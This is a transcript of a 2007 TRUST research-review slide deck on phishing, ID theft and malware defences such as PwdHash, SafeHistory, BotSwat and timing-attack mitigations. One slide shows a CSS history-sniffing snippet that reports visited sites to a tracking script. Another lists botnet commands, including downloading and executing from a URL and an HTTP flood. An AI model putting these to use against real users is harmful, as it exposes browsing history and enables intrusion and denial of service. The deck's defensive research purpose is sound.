trust, berkeley meetings, march 19-21, 2007 online id theft, phishing, and malware primary faculty...
TRANSCRIPT
TRUST, Berkeley Meetings, March 19-21, 2007
Online ID Theft, Phishing, and Malware
Primary faculty
Stanford: Boneh, Mitchell
Berkeley: Tygar,Mulligan
CMU: Perrig, Song
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 2
Topics
Phishing detection and prevention– Browser extensions, Server support– Cache and link attacks, timing attacks, …– Authentication using trusted platforms
Smartphone, Virtualization, Password token
User interface issues– Tricky problem: users are fooled– Do users understand EULAs? (need I ask?)
Malware detection and mitigation– Signature generation– Behavioral botnet detection
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 4
Classical phishing attack
password?
Sends email: “There is a problem with your eBuy account”
User clicks on email link to www.ebuj.com.
User thinks it is ebuy.com, enters eBuy username and password.
Password sent to bad guy
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 5
Modern threats
Spear phishing– Targeted email to known customers, evade spam filter
Man-in-the-middle attacks– Forward communication to honest server– Attack one-time passwords, server defenses
Cookie theft Keyloggers
– Install via worms, or as browser infections– Acoustic emanations
Botnets– Host keyloggers, send spam, steal credentials, etc.– Vint Cerf: as many as ¼ of all machines on Internet
Many user interface issues related to deception
TRUST, Berkeley Meetings, March 19-21, 2007
Basic questions
Security of human/computer systems– Phishing: not attack on OS, network protocol, or computer application– Attack on user through the user’s computer
Deception works because user has incomplete and unreliable information, or does not understand the information that is presented
Web authentication– How can clients and servers authenticate each other?– Passwords are low entropy but easy to remember– Images, other indicators easy to spoof, esp. if attacker has info about user
Isolation for web “sessions”– Implicit notion of process user visiting site– Many complexities: ads, redirects, mashups
Privacy expectations and laws– Users transmit sensitive information to web sites– What privacy can they expect? How can this be guaranteed?
Part of the problem is to identify and articulate the core issues– Principled understanding of web activity will lead to more secure browser
design, clearer understanding of contract between browser and server, better server practices
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 8
Berkeley: Dynamic Security Skins
Automatically customize secure windows Visual hashes
– Random Art - visual hash algorithm – Generate unique abstract image for each
authentication– Use the image to “skin” windows or web content– Browser generated or server generated
Commercial spin-off
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 9
CMU Phoolproof prevention
Eliminates reliance on perfect user behavior Protects against keyloggers, spyware. Uses a trusted mobile device to perform
mutual authentication with the server
password?
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 10
SafeHistory
Adaptive phishing attacks (a super-phish):– Phishing site queries browser’s visited links:
<style>a#visited { background: url(track.php?example.com);
}</style><a href="http://example.com/">Hi</a>
– Presents phishing page based on visited links SafeHistory: (www.safehistory.com)
– Enforce “same origin policy” on browser state Tech transfer: Available as Firefox extension
– www.safehistory.com
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 11
pwd Hash( pwd, domain-name )
PwdHash www.pwdhash.com
Browser extension for stronger pwd auth.– Mostly transparent to users– Main challenge: block Javascript-based attacks
Recent work:– Tech transfer: integrate with RSA SecurID server– Consistent interface for IE and Firefox extensions– Computerworld 2006 Horizon award
TRUST, Berkeley Meetings, March 19-21, 2007
Berkeley: Understanding EULAs
Confirmed previous study: EULAs are not effective in informing users even when agreements are read by user
– Users exhibit high installation rates, lack of knowledge about program & high regret
Short notice before or after the installation can significantly influence users’ behavior if subjects paused to read them
– Lower installation rates, but still noticeable regret– Reading times correlated with decision making & regret– Post notice more effective in grabbing attention of every user– Other support mechanisms needed to help user
Last TRUST Review: Stanford study on spyware motivated by EULA legal issues
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 13
Malware detection
Minesweeper: Automatically Identifying Trigger-based Behavior in Programs– Dawn Song, CMU
Panorama: Capturing System-wide Information Flow for Malware Detection and Analysis– Dawn Song, CMU
BotSwat: Host-based behavioral bot detection– Liz Stinson, John Mitchell, Stanford
TRUST, Berkeley Meetings, March 19-21, 2007
Recent RFID passport requirements in U.S. and Germany
Uses Basic Access Control
Passport holder has no way of knowing if their passport is being scanned.
Uses an ISO14443 contactless RFID chip from Inferion with 64K memory
Contains JPEGs of photos and fingerprints
Privacy ID Theft Issues in ePassports
TRUST, Berkeley Meetings, March 19-21, 2007
• Guessing the Access key: access key is derived from MRZ, which consists of passport #, year of birth, and check digits. But passport #s are sequential, implying a correlation between date of issue and #. If you can see the passport holder, can a hacker guess someone’s birthday year?
• Traceability: RFID systems uses fixed unique low level tag identifiers, making an ePassport traceable.
• Eavesdropping: “Listening” to a legitimate reader-RFID conversation
• Othen overlooked: Fallback: What if my biometric identity has been compromised.. How can I prove “it wasn’t me”?
ePassports
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 16
Research Spotlight
Cookie Managment
• Locked IP Cookies• Doppelganger
Doug Tygar
Chris Karlof
David Wagner
Umesh Shankar
TRUST, Berkeley Meetings, March 19-21, 2007
Cookie Management
Cookies are both a challenge and opportunity for ID theft protection
Doppelganger: a system for automatically sensing how cookies are used
IP locked cookies: a framework alternative to anti-phishing, anti-pharming– Unlike existing solutions (SiteKey) robust against
man-in-the-middle-attacks
"Title", J.Q. Speaker-Name 17
TRUST, Berkeley Meetings, March 19-21, 2007
Berkeley: Doppelganger
(Karlof, U. Shankar) Flexible automatic cookie management Notes when cookies makes difference to web
page
"Title", J.Q. Speaker-Name 18
TRUST, Berkeley Meetings, March 19-21, 2007
Berkeley: Locked IP cookies
Powerful solution to Phishing (Karlof, Tygar, Wagner)
"Title", J.Q. Speaker-Name 19
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 20
Research Spotlight
KeyboardAcoustic
Emanations
Li Zhuang
Feng Zhou
Doug Tygar
TRUST, Berkeley Meetings, March 19-21, 200721
Keyboard Acoustic Sniffing
Acoustic emanations from keyboard
Example of statistical learning techniques in computer security (vulnerability analysis, detection)
Alice’spassword
TRUST, Berkeley Meetings, March 19-21, 200722
Overview
Initial training
Unsupervised Learning
Language Model Correction
Sample Collector
Classifier Builder
keystroke classifierrecovered keystrokes
Feature Extraction
wave signal
Subsequent recognition
Feature Extraction
wave signal
Keystroke Classifier
Language Model Correction(optional)
recovered keystrokes
TRUST, Berkeley Meetings, March 19-21, 200723
Two Copies of Recovered Text
Before spelling and grammar correction
After spelling and grammar correction
_____ = errors in recovery = errors in corrected by grammar
TRUST, Berkeley Meetings, March 19-21, 200724
Experiment
Single keyboard– Logitech Elite Duo wireless keyboard– 4 data sets recorded in two settings
Quiet & noisy Keystrokes are clearly separable from consecutive keys
– Automatically extract keystroke positions in the signal with some manual error correction
TRUST, Berkeley Meetings, March 19-21, 200725
Recording length Number of words Number of keys
Set 1 ~12 min ~400 ~2500
Set 2 ~27 min ~1000 ~5500
Set 3 ~22 min ~800 ~4200
Set 4 ~24 min ~700 ~4300
Set 1 (%) Set 2 (%) Set 3 (%) Set 4 (%)
Word Char Word Char Word Char Word Char
Initial 35 76 39 80 32 73 23 68
Final 90 96 89 96 83 95 80 92
Data sets
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 26
Research Spotlight
Timing AttacksAndrew Bortz
Web servers are vulnerable to timing attacks that reveal useful phishing information
Palash Nandy
Dan Boneh
John Mitchell
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 27
Spear-Phishing
Targeted email to known potential victims, e.g., customers of specific bank– Beat existing techniques for filtering– Higher success rate– Lower detection rate
But need to know sites a user visits– Generally hard to obtain this type of data
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 28
Forget your password?
Most sites have “Forgot my password” pages
– These pages frequently leak whether an email is valid or not at that site
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 29
Direct Timing
Time a login attempt The response time of the
server depends on whether the email address used is valid or not
This problem affects every tested web site!
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 30
Cross-Site Timing Attack
Hijack a user’s browser session to time sites Many timing dependencies on the user’s
relationship with the target site Here, we can distinguish logged in from not
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 31
Solutions and Future Work
Good solutions are server-side– Client-side solutions exist only for cross-site timing,
and they are brittle
Controlling response time to mitigate attacks– Eliminate problem by making every response take
the same amount of time– If that is impossible, then “round” the amount of
response time
Future work:– Apache module to control response time
automatically
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 32
Research Spotlight
User Interfaces
An Evaluation of Extended
Validation andPicture-in-Picture Phishing Attacks
Collin Jackson
Dan Simon,Desney Tan
Adam Barth
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 33
Anti-Phishing Features in IE7
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 35
Results: Is this site legitimate?
Future– More user studies, UI evaluations
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 36
Research Spotlight
Minesweeper:
Automatically Identifying Trigger-based Behavior in Programs
Dawn Song
Dawn Song
TRUST, Berkeley Meetings, March 19-21, 2007"Title", J.Q. Speaker-Name 37
Research Spotlight
BotSwat
Host-based behavioral bot detection
Dawn Song
Elizabeth StinsonJohn Mitchell
TRUST, Berkeley Meetings, March 19-21, 2007
Botnet
bot master Intermediary
IRC svr
IRC svr
IRC svr
...
TRUST, Berkeley Meetings, March 19-21, 2007
sample bot commands
execute {0,1} <prog_path> [params]
killprocess <proc_name>
makedir <loc_path>
http.execute <URL> <local_path>
ping <host/IP> <num> <size> <t_out>
scan <IP> <port> <delay>redirect <loc_port> <rem_host> <rem_port>
ddos.httpflood <URL> <#> <ref> <recurse?>
TRUST, Berkeley Meetings, March 19-21, 2007
BotSwat
bind(…) CreateProcessA(…) NtCreateFile(…)...
S
O
U
R
C
E
S
S
I
N
K
S
?? ? ?
TRUST, Berkeley Meetings, March 19-21, 2007
Technology Transition Plan
PwdHash: RSA Security (www.pwdhash.com)– Initial integration completed fall 2006– Hope to convince IE team to embed natively in IE
SpyBlock deployment:– Available at http://getspyblock.com/– Relevant companies: Mocha5, VMWare– Dialog with companies about transaction generators
SafeHistory: Microsoft, Mozilla.– Available at www.safehistory.com
TRUST, Berkeley Meetings, March 19-21, 2007
Public relations activities
News articles on PwdHash:
– Many articles in popular press, still appearing
– Computerworld Horizon Award: August 2006
SafeHistory & SafeCache:– WWW ’06 paper
Timing attacks– WWW ’07 paper
SpyBlock and transaction generation– Report completed; conference paper in process
TRUST, Berkeley Meetings, March 19-21, 2007
PwdHash and RSA SecurID
Tech transfer: available as IE and Firefox extensions– Working to convince MS to embed natively into IE
Integration with RSA SecurID:– Motivation: “man in the middle” phishing attacks
Defeats one-time password systems
– Phase I: apply PwdHash to one-time passwords Requires updates to SecurID server and PwdHash
– Phase II: authenticate server to client Planned for next year